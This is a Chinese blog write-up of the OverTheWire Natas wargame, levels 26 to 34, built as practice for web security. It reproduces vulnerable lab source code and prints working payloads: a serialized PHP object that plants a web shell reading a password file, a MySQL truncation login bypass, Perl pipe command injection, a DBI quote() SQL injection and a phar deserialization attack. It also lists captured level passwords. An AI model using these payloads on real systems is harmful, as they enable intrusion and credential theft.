natas(level26-level34)通关(三)

最新推荐文章于 2023-05-21 16:32:26 发布
最新推荐文章于 2023-05-21 16:32:26 发布
阅读量403 收藏 1
点赞数 1
分类专栏: web渗透测试心得 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tempulcc/article/details/108846195
版权

natas通关指南

level26

URL:http://natas26.natas.labs.overthewire.org
Username: natas26
Password: oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T

源码:

<?php
    
    class Logger{
        private $logFile;
        private $initMsg;
        private $exitMsg;
      
        function __construct($file){
            // initialise variables
            $this->initMsg="#--session started--#\n";
            $this->exitMsg="#--session end--#\n";
            $this->logFile = "/tmp/natas26_" . $file . ".log";
      
            // write initial message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$initMsg);
            fclose($fd);
        }                       
      
        function log($msg){
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$msg."\n");
            fclose($fd);
        }                       
      
        function __destruct(){
            // write exit message
            $fd=fopen($this->logFile,"a+");
            fwrite($fd,$this->exitMsg);
            fclose($fd);
        }                       
    }
 
    function showImage($filename){
        if(file_exists($filename))
            echo "<img src=\"$filename\">";
    }

    function drawImage($filename){
        $img=imagecreatetruecolor(400,300);
        drawFromUserdata($img);
        imagepng($img,$filename);     
        imagedestroy($img);
    }
    
    function drawFromUserdata($img){
        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
        
            $color=imagecolorallocate($img,0xff,0x12,0x1c);
            imageline($img,$_GET["x1"], $_GET["y1"], 
                            $_GET["x2"], $_GET["y2"], $color);
        }
        
        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
            if($drawing)
                foreach($drawing as $object)
                    if( array_key_exists("x1", $object) && 
                        array_key_exists("y1", $object) &&
                        array_key_exists("x2", $object) && 
                        array_key_exists("y2", $object)){
                    
                        $color=imagecolorallocate($img,0xff,0x12,0x1c);
                        imageline($img,$object["x1"],$object["y1"],
                                $object["x2"] ,$object["y2"] ,$color);
            
                    }
        }    
    }
    
    function storeData(){
        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
            $new_object["x1"]=$_GET["x1"];
            $new_object["y1"]=$_GET["y1"];
            $new_object["x2"]=$_GET["x2"];
            $new_object["y2"]=$_GET["y2"];
        }
        
        if (array_key_exists("drawing", $_COOKIE)){
            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
        }
        else{
            // create new array
            $drawing=array();
        }
        
        $drawing[]=$new_object;
        setcookie("drawing",base64_encode(serialize($drawing)));
    }
?>

<h1>natas26</h1>
<div id="content">
Draw a line:<br>
<form name="input" method="get">
X1<input type="text" name="x1" size=2>
Y1<input type="text" name="y1" size=2>
X2<input type="text" name="x2" size=2>
Y2<input type="text" name="y2" size=2>
<input type="submit" value="DRAW!">
</form> 

<?php
    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||
        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){  
        $imgfile="img/natas26_" . session_id() .".png"; 
        drawImage($imgfile); 
        showImage($imgfile);
        storeData();
    }
    
?>

随便提交参数

GET /?x1=1&y1=1&x2=1&y2=1 HTTP/1.1

生成的cookie:

GET /img/natas26_hu5irlcadutt0n5rp7bdod5mo2.png HTTP/1.1
Host: natas26.natas.labs.overthewire.org
Referer: http://natas26.natas.labs.overthewire.org/?x1=1&y1=1&x2=1&y2=1
Cookie: PHPSESSID=hu5irlcadutt0n5rp7bdod5mo2; drawing=YToxOntpOjA7YTo0OntzOjI6IngxIjtzOjE6IjEiO3M6MjoieTEiO3M6MToiMSI7czoyOiJ4MiI7czoxOiIxIjtzOjI6InkyIjtzOjE6IjEiO319

将cookie中drawing的值进行base64解码

a:1:{i:0;a:4:{s:2:"x1";s:1:"1";s:2:"y1";s:1:"1";s:2:"x2";s:1:"1";s:2:"y2";s:1:"1";}}

代码对传入的参数为进行任何过滤,只是检测cookie中是否drawing

关键源码:

function storeData(){
        $new_object=array();
        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
            $new_object["x1"]=$_GET["x1"];
            $new_object["y1"]=$_GET["y1"];
            $new_object["x2"]=$_GET["x2"];
            $new_object["y2"]=$_GET["y2"];
        }
        
        if (array_key_exists("drawing", $_COOKIE)){            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));
        }
        else{
            // create new array
            $drawing=array();
        }        
        $drawing[]=$new_object;
        setcookie("drawing",base64_encode(serialize($drawing)));
    }

根据上面的代码,我们伪造cookie中drawing的值,会经过unserialize()函数处理,执行完后会调用__destruct()方法,将有关内容写入文件

直接构造payload:
O:6:“Logger”:3:{s:15:" Logger logFile";s:11:“img/aaa.php”;s:15:" Logger initMsg";s:0:"";s:15:" Logger exitMsg";s:46:"<?echo include '/etc/natas_webpass/natas27';?>";}

因为根据变量的不同,经过序列化后的字符串是有区别的:
变量类别分三种:
Ⅰ)public:正常操作,在序列化时原型就可以;
Ⅱ)protected:序列化后,在变量名前面加上%00*%00;
Ⅲ)private:序列化后,在变量名前加上%00类名%00;
详细请参考我的文章《php反序列化漏洞的简单复现(一)》

base64加密:
Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxMToiaW1nL2FhYS5waHAiO3M6MTU6IgBMb2dnZXIAaW5pdE1zZyI7czowOiIiO3M6MTU6IgBMb2dnZXIAZXhpdE1zZyI7czo0NjoiPD9lY2hvIGluY2x1ZGUgJy9ldGMvbmF0YXNfd2VicGFzcy9uYXRhczI3Jzs/PiI7fQ==

用php生成payload

<?php
class Logger{
         private $logFile ;
         private $initMsg ;
         private $exitMsg ;
         function __construct(){   #注入信息
             $this ->initMsg= "" ;
             $this ->exitMsg= "<?echo include '/etc/natas_webpass/natas27';?>" ;
             $this ->logFile= "img/aaa.php" ;
         }
}
 
$test = new Logger();
echo serialize( $test );
echo "\n" ;
echo base64_encode (serialize( $test ));    #显示base64编码后的序列化字符串
?>

访问:http://natas26.natas.labs.overthewire.org/img/aaa.php
获取密码:55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ

level27

http://natas27.natas.labs.overthewire.org
username:natas27
password:55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ

原理:
对于VARCHAR列,超出列长度的尾随空格将在插入之前被截断,并生成警告,而不管使用的是哪种SQL模式。对于 CHAR列,无论SQL模式如何,都会以静默方式执行截断从插入值的多余结尾空格。
所有MySQL排序规则都是PAD SPACE类型。这意味着所有的 CHAR和VARCHAR,和 TEXT值被比较,而不考虑任何尾随空格。

重点:在插入(insert)时溢出部分将全部被截断,而查询(select)的时候却不会

payload:
username:natas28 aaa(中间空白为超过64个空格)
password:任意
在这里插入图片描述

再次使用natas28和刚才的密码,输出natas28的密码

在这里插入图片描述

level28

http://natas28.natas.labs.overthewire.org
username:natas28
password:JWwR438wkgTsNKBbcJoowyysdM82YjeF

这题考察ecp加密,不懂,暂时跳过
natas29:airooCaiseiyee8he8xongien9euhe8b

level29

http://natas29.natas.labs.overthewire.org
username:natas29
password:airooCaiseiyee8he8xongien9euhe8b

查看源码:
payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat+index.pl%00
源码:

if(param('file'))
{ 
  $f=param('file'); 
  if($f=~/natas/)
    { 
      print "meeeeeep!"; 
    } 
  else
  { 
     open(FD, "$f.txt"); 
     print "";
     while (){
         print CGI::escapeHTML($_);
            }
     print ""; 
   }
}

这部分代码过滤了natas,我们可以将其绕过。
payload:http://natas29.natas.labs.overthewire.org/index.pl?file=|cat+/etc/na%22tas_webpass/nat%22as30%00

natas30 password:wie9iexae0Daihohv8vuu3cei9wahf0e

level30

http://natas30.natas.labs.overthewire.org
username:natas30 password:wie9iexae0Daihohv8vuu3cei9wahf0e

源码:

if ('POST' eq request_method && param('username') && param('password')){
    my $dbh = DBI->connect( "DBI:mysql:natas30","natas30", "<censored>", {'RaiseError' => 1});
    my $query="Select * FROM users where username =".$dbh->quote(param('username')) . " and password =".$dbh->quote(param('password')); 

    my $sth = $dbh->prepare($query);
    $sth->execute();
    my $ver = $sth->fetch();
    if ($ver){
        print "win!<br>";
        print "here is your result:<br>";
        print @$ver;
    }
    else{
        print "fail :(";
    }
    $sth->finish();
    $dbh->disconnect();
}

资料表示,quote()函数采用列表参数,并解析第二项作为一个选项参数来表示第一项的类型。如果类型是非字符串,则它将返回first的值而不进行任何引用。因此第一个password必须是字符型。
可以构造POST:
username=xx&password='sdf’ or 1=1 &password=2

在这里插入图片描述
natas31:hay7aecuungiuKaezuathuk9biin0pu1

level31

http://natas31.natas.labs.overthewire.org
username:natas31
password:hay7aecuungiuKaezuathuk9biin0pu1

详细原理可参考大师傅的文章《natas(28-34)(终章)》
本文只是复现,perl语言的函数确实还不了解

在这里插入图片描述
在这里插入图片描述
password:no1vohsheCaiv3ieH4em1ahchisainge

level32

http://natas32.natas.labs.overthewire.org
username:natas32
password:no1vohsheCaiv3ieH4em1ahchisainge

index.pl源码:

my $cgi = CGI->new;
if ($cgi->upload('file')) {
    my $file = $cgi->param('file');
    print '<table class="sortable table table-hover table-striped">';
    $i=0;
    while (<$file>) {
        my @elements=split /,/, $_;
        if($i==0){ # header
            print "<tr>";
            foreach(@elements){
                print "<th>".$cgi->escapeHTML($_)."</th>";   
            }
            print "</tr>";
        }
        else{ # table content
            print "<tr>";
            foreach(@elements){
                print "<td>".$cgi->escapeHTML($_)."</td>";   
            }
            print "</tr>";
        }
        $i+=1;
    }
    print '</table>';
}
else{
print <<END;

同上题,参考大师傅的文章《natas(28-34)(终章)》
本文只是复现,perl语言的函数确实还不了解

/index.pl?/bin/ls%20-l%20.%20|
在这里插入图片描述
查看文件getpassword.c文件内容
/index.pl?/bin/cat%20getpassword.c%20|
在这里插入图片描述
/index.pl?./getpassword%20|
在这里插入图片描述
password:shoogeiGa2yee3de6Aex8uaXeech5eey

level33

http://natas33.natas.labs.overthewire.org
username:natas33
password:no1vohsheCaiv3ieH4em1ahchisainge

源码:

<?php
            // graz XeR, the first to solve it! thanks for the feedback!
            // ~morla
            class Executor{
                private $filename=""; 
                private $signature='adeafbadbabec0dedabada55ba55d00d';
                private $init=False;

                function __construct(){
                    $this->filename=$_POST["filename"];
                    if(filesize($_FILES['uploadedfile']['tmp_name']) > 4096) {
                        echo "File is too big<br>";
                    }
                    else {
                        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], "/natas33/upload/" . $this->filename)) {
                            echo "The update has been uploaded to: /natas33/upload/$this->filename<br>";
                            echo "Firmware upgrad initialised.<br>";
                        }
                        else{
                            echo "There was an error uploading the file, please try again!<br>";
                        }
                    }
                }

                function __destruct(){
                    // upgrade firmware at the end of this script

                    // "The working directory in the script shutdown phase can be different with some SAPIs (e.g. Apache)."
                    if(getcwd() === "/") chdir("/natas33/uploads/");
                    if(md5_file($this->filename) == $this->signature){
                        echo "Congratulations! Running firmware update: $this->filename <br>";
                        passthru("php " . $this->filename);
                    }
                    else{
                        echo "Failur! MD5sum mismatch!<br>";
                    }
                }
            }
        ?>

<?php
    session_start();
    if(array_key_exists("filename", $_POST) and array_key_exists("uploadedfile",$_FILES)) {
      new Executor();}
?>

没想到是一个反序列化的题,新姿势,详细原理请参考大师傅的文章《natas(28-34)(终章)》《利用 phar 拓展 php 反序列化漏洞攻击面》
本文只是复现,如果生成phar时报错“disabled by the php.ini setting phar.readonly”,修改本地php.ini文件配置为phar.readonly = Off
在这里插入图片描述
password:shu5ouSu6eicielahhae0mohd4ui5uig

level34

http://natas33.natas.labs.overthewire.org
username:natas33
password:shu5ouSu6eicielahhae0mohd4ui5uig

在这里插入图片描述

tempulcc
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS挑战之旅平台通关练习level1-level6
qq_45970858的博客
10-18 500
部署容器,进入XSS挑战之旅 首先需要关闭防火墙,输入以下命令进行关闭,出现not running红色字样则说明关闭成功 systemctl stop^c firewall-cmd -h^c systemctl stop firewalld.service systemctl stop firewalld systemctl stop firewalld firewall-cmd --stat 这里可以输入一个命令,禁止防火墙开机自启 systemctl disable filewalld 关闭
170821 WarGames-Natas(26
whklhhhh的博客
08-21 358
1625-5 王子昂 总结《2017年8月21日》 【连续第323天总结】 A. Natas26 B. 这次PHP脚本冗长,读下来也没看到什么漏洞 最后了解到unserialize()反序列化函数存在对象注入漏洞 正常的脚本中,serialize序列化函数可以将一个PHP对象转化成字符串,然后再通过unserialize反序列化函数将其还原,这样可以方便地编码对象来传递 但是这里存在
level通关详解
最新发布
tubug的博客
05-21 710
我尝试输入一下www.baidu.com,看到源代码也是链接不合法,到这里我们就会发现极其有可能是对http://或者是https://进行了匹配,我们尝试一下,发现是http://一个进行了编码,另一个肯定也是做了某种处理,我们想象一下,会不会是检测我们输入的字符进行了某种匹配。可以看到一个还是对内容进行编码,另一个则是加了一个_ 这说明服务器端对我们输入的内容进行了过滤。我们可以用,但是发现它对这些进行过滤了,我们进行大小写,onfocus一类的发现都进行处理了。
Natas Wargame Level26 Writeup(PHP对象注入)
a_18067的博客
05-24 187
源码: <?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private $exitMsg; ...
natas26题解
lyover的博客
12-07 597
这个题涉及到PHP的class对象注入 题目贴上源码<?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private $e
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas-Solutions-master这个压缩包很可能是包含了所有Natas挑战的解答和代码实现,对学习和复习这些知识点提供了宝贵的资源。通过深入研究和实践,你可以逐步建立起牢固的Web安全基础,并为应对更复杂的安全挑战做好...
Python库 | natas-1.0.2.tar.gz
03-06
《Python库natas-1.0.2:深入探索与应用》 在IT行业中,Python是一种广泛使用的开发语言,尤其在后端开发领域,它的简洁语法和强大的库支持使其成为首选。今天我们要深入探讨的是一款名为natas的Python库,其版本为...
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
"Natas-master"压缩包文件可能包含了一个Natas游戏解决方案的完整集合,包括了各个级别的解题思路和代码示例。玩家可以参考这些资源,结合自己的实践,加深对Web安全的理解。 总之,Natas游戏提供了一个理想的环境...
natas:Natas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名(例如,级别0的natas0)及其密码。 每个级别都可以访问下一个级别的密码。 您的工作是以某种方式获取下一个密码并进行升级。 所有密码也都存储在etcnatas_webpass中。 例如,natas5的密码存储在文件etcnatas_web
02-23
natas:Natas Natas教授服务器端Web安全的基础知识。 每个nata级别都由位于http://natasX.natas.labs.overthewire.org上的自己的网站组成,其中X是级别编号。 没有SSH登录。 要访问某个级别,请输入该级别的用户名...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
natas(21-27)
半夜好饿的博客
08-19 443
natas21: 本关有两个页面,一个和之前的相同,显示“You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.”,另一个好像是一个修改CSS的页面,查看第一个页面的源码,会发现和前一关相似,都是需要_SESSION[“admin”]==1才可看到下一级的密码。 加上第...
natas27题解(终章)
lyover的博客
12-08 1024
可以输入账号密码 先尝试用natas28登录,提示密码错误,也就是说,这个账号是写在数据库里的,并且密码就是我们想要的 // database gets cleared every 5 min 每五分钟重置数据库,如果一直提交natas28密码为空(或者随便,但是要写在post的参数里),恰好等到重置那个的时刻,库里就会有两个natas,在调用checkCredentials函数的时
OverTheWire的natas游戏(21-34)
qq_40710190的博客
07-18 682
natas solution(21-34) Natas Level 20 → Level 21 Username: natas21 URL: http://natas21.natas.labs.overthewire.org 这一关涉及到一个共享session的知识点,算是本关的收获吧。 进入页面后看到提示 Note: this website is colocated with http://natas21-experimenter.natas.labs.overthewire.org 在看
natas(28-34)(终章)
半夜好饿的博客
08-22 655
natas28 这题是真的难,密码不懂的我真的有点懵逼,好在Q童鞋不嫌我问题弱智,很耐心的替我解答,在此祝TA恭喜发财! 这题打开之后什么都没有,源码也看不到了,只有一个搜索框,而搜索的是笑话库,根据提交的字符串,随机返回含有字符串的笑话。 POST提交明文,返回一个GET的url,值是明文与sql语句组合后被加密的内容,随便提交几个值,会发现解码(url和base64)后的长度相同,然后不知道怎...
Overthewire natas27 最新解法2023版本
mengzh620的博客
04-24 301
import reoutput:Array。
mysql溢出漏洞_Natas27 Writeup(mysql溢出截断漏洞)
weixin_39792393的博客
01-28 106
Natas27: 一个登录节界面,查看源码。 varwechallinfo={"level":"natas27","pass":""};natas27// morla / 10111// database gets cleared every 5 min/*CREATE TABLE `users` (`username` varchar(64) DEFAULT NULL,`password` v...
Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)
a_18067的博客
05-25 121
前端: <html> <head> <!-- This stuff in the header has nothing to do with the level --> </head> <body> <h1>natas27</h1> <div id="content"> <form ...
网络空间安全——Wargame靶场(Natas)
weixin_44717952的博客
05-20 1174
访问的网站才能看到密码”,在 http 的 refer 字段中表明来源,所以我们需要修改这个字段的值为上面的网址。拦截浏览器发送的请求,修改 refer 字段中的值为上述网址,然后点击 Forward,即可看到密码。爬虫在收集网页信息时,首先查看该网页的 robot.txt 文件,从中获取可以爬取的内容信息。右键->查看网页源代码,发现什么都没有,但是这时候一行字引起我们的注意,Google 都找不到这个网站。我们可以看到 /s3cr3t/ 文件夹,在浏览器中打开它,我们就可以看到密码了。
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值